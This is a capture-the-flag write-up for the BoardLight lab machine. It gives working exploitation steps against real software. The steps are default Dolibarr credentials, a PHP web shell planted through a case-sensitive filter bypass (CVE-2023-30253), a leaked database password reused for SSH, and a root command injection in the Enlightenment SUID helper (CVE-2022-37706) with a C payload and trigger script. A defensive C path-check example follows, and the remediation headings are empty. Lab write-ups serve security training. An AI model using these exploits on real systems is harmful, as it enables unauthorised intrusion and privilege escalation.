
boardlight

Linux · Easy · released 2024-05-25 · retired 2024-09-28

Summary

BoardLight is an Easy Linux box that showcases common real-world misconfigurations: an unpatched CRM system with filter bypasses, credential reuse across services, and a local privilege escalation through an SUID binary path traversal.

The chain:

  1. Recon reveals a virtual host crm.board.htb running Dolibarr 17.0.0.
  2. The default administrator credentials dolibarrowner:dolibarrowner grant access.
  3. Exploiting CVE-2023-30253, a case-sensitive PHP keyword filter bypass (<?Php instead of <?php), allows injection of a reverse shell via the website CMS module, yielding a foothold as www-data.
  4. Reading the Dolibarr configuration file (/var/www/html/crm.board.htb/htdocs/conf/conf.php) reveals the database password serverfun2$2023!!.
  5. This password was reused for the system user larissa, granting SSH access and the user.txt flag.
  6. Privilege escalation to root is achieved via CVE-2022-37706. The system has an SUID binary, /usr/bin/enlightenment_sys, which only checks that a mount source path begins with /dev/ before building a shell command from it, so a path such as /dev/../tmp/... passes the check while .. traversal escapes /dev. By creating a directory whose name contains a command separator (;) followed by the path of a malicious payload, we achieve command injection and execute the payload as root to read root.txt.

Recon

22/tcp     OpenSSH
80/tcp     boardlight.htb
+ vhost: crm.board.htb (Dolibarr)

Foothold — Dolibarr CVE-2023-30253

Doing this manually from the start, the foothold relies on the default credentials and a PHP filter bypass:

# default creds
curl -X POST http://crm.board.htb/htdocs/index.php?mainmenu=login \
   -d 'actionlogin=login&username=dolibarrowner&password=dolibarrowner'

# CVE-2023-30253: <?Php passes filter
# website module → New page → body:
<?Php system($_GET['c']); ?>
# Save, then fetch:
curl 'http://crm.board.htb/htdocs/website/index.php?website=mysite&pageref=newp&c=id'
# www-data

With www-data access, we can extract the database configuration, revealing a password we can try to reuse:

grep pass /var/www/html/crm.board.htb/htdocs/conf/conf.php
# ... serverfun2$2023!!

# SSH as larissa, reusing the discovered database password
ssh larissa@boardlight.htb
# Get user flag
cat user.txt

(Note: During my walkthrough, I directly connected via SSH reusing the password serverfun2$2023!! as I skipped the initial Dolibarr steps to expedite the process based on known vulnerabilities.)

Privesc — Enlightenment CVE-2022-37706

Searching for SUID binaries reveals the vulnerable Enlightenment utility:

find / -perm -4000 2>/dev/null
# ...
# /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys

Bash resets its effective UID to the real UID when started from a setuid context (unless invoked with -p), so a plain shell payload would lose the elevated privileges. Instead we craft a small C program that explicitly keeps root and copies the root flag to a world-readable location.

Payload (exploit.c):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* Keep the root identity inherited from the SUID parent. */
    setuid(0);
    setgid(0);
    /* Copy the flag somewhere the unprivileged user can read it. */
    system("cat /root/root.txt > /dev/shm/root.txt && chmod 666 /dev/shm/root.txt");
    return 0;
}

Exploitation Script:

# Prepare the mount point and the traversal directory whose name carries the ; separator
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

# Compile the payload (exploit.c saved as /tmp/exploit.c)
gcc /tmp/exploit.c -o /tmp/exploit
chmod a+x /tmp/exploit

# Trigger command injection in enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys \
  /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \
  "/dev/../tmp/;/tmp/exploit" /tmp///net

# Read the extracted flag
cat /dev/shm/root.txt

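The validation flaw behind the privesc, as an added example that is not the page's or Enlightenment's own code: a bare /dev/ prefix test on an uncanonicalized path, next to a hardened check that canonicalizes the path lexically first and refuses shell metacharacters. The function names and the canonicalizer are mine; the sample path is the one used above.

```c
#include <stdbool.h>
#include <string.h>

/* Illustrative naive check (not the real enlightenment_sys code): a bare
 * prefix test accepts "/dev/../tmp/;/tmp/exploit" because ".." is never resolved. */
bool naive_dev_check(const char *path) {
    return strncmp(path, "/dev/", 5) == 0;
}

/* Lexically canonicalize an absolute path: collapse repeated '/', "." and "..".
 * Returns false if the path is not absolute or the result does not fit in out. */
bool canonicalize(const char *path, char *out, size_t outlen) {
    if (path[0] != '/' || outlen < 2) return false;
    size_t n = 0;                       /* bytes written to out, excluding NUL */
    const char *p = path;
    while (*p) {
        while (*p == '/') p++;          /* skip separators */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 1 && seg[0] == '.') continue;
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            while (n > 0 && out[n - 1] != '/') n--;   /* drop the last segment */
            if (n > 0) n--;                            /* and its leading slash */
            continue;
        }
        if (n + 1 + len + 1 > outlen) return false;
        out[n++] = '/';
        memcpy(out + n, seg, len);
        n += len;
    }
    if (n == 0) out[n++] = '/';
    out[n] = '\0';
    return true;
}

/* Hardened check: canonicalize first, then require the /dev/ prefix and refuse
 * shell metacharacters, because the original program hands the path to a shell. */
bool hardened_dev_check(const char *path) {
    char canon[4096];
    if (!canonicalize(path, canon, sizeof canon)) return false;
    if (strncmp(canon, "/dev/", 5) != 0) return false;
    return strpbrk(canon, " \t\n;|&$`\"'\\<>(){}") == NULL;
}
```

The naive check accepts the traversal path and the hardened one rejects it; the real fix is to stop building shell strings from user input altogether and exec the mount helper with an argument vector.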
Why each step worked

Counterfactuals / Remediation

Source attribution

Initial reference material and steps adapted from:
